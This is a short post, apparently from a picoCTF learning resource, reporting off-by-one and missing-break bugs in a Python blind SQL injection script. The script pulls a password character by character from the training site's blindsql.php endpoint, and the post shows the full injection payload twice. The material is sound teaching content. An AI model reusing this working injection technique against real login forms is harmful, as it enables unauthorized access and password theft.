Fix Bug in the Sql Injection Code

[JollyFrolics]

The blind SQL injection code

import requests
from string import printable

accum = ""
for i in range(40):
  for letter in printable:
    accum += letter

    r = requests.post("https://primer.picoctf.org/vuln/web/blindsql.php?&username=WeDontCare&password=' or '"
    + letter +"'=( select substr(binary password,"+str(i)+",1) from pico_blind_injection where id=1 ) and ''= '")

    if 'NOTHING FOUND...' in r.text:
      accum = accum[:-1]
      print("nope")
    else:
      print(f"We found the character: {letter}")

print(accum)

loop using range(40). This iterator starts at 0 instead of 1. This causes one extra loop in the problem.

Also in the else block of the if 'NOTHING FOUND...' in r.text: their is no break causing the substr to be called on the value
of the position we already know.

To illustrate this:
If we ran this code

from string import printable

import requests

accum = ""
for i in range(40):
    for letter in printable:
        accum += letter

        r = requests.post(
            "https://primer.picoctf.org/vuln/web/blindsql.php?&username=WeDontCare&password=' or '"
            + letter
            + "'=( select substr(binary password,"
            + str(i)
            + ",1) from pico_blind_injection where id=1 ) and ''= '"
        )

        if "NOTHING FOUND..." in r.text:
            accum = accum[:-1]
            print(f"nope: {letter} i:{i}")
        else:
            print(f"We found the character: {letter}")

print(accum)

Which just adds letters variable to the nope we are printing. The result is:

The next problem is that after letter is found the value of substr isn't updated

The solve would be to range(1, 40) and to add a break after the else block ends.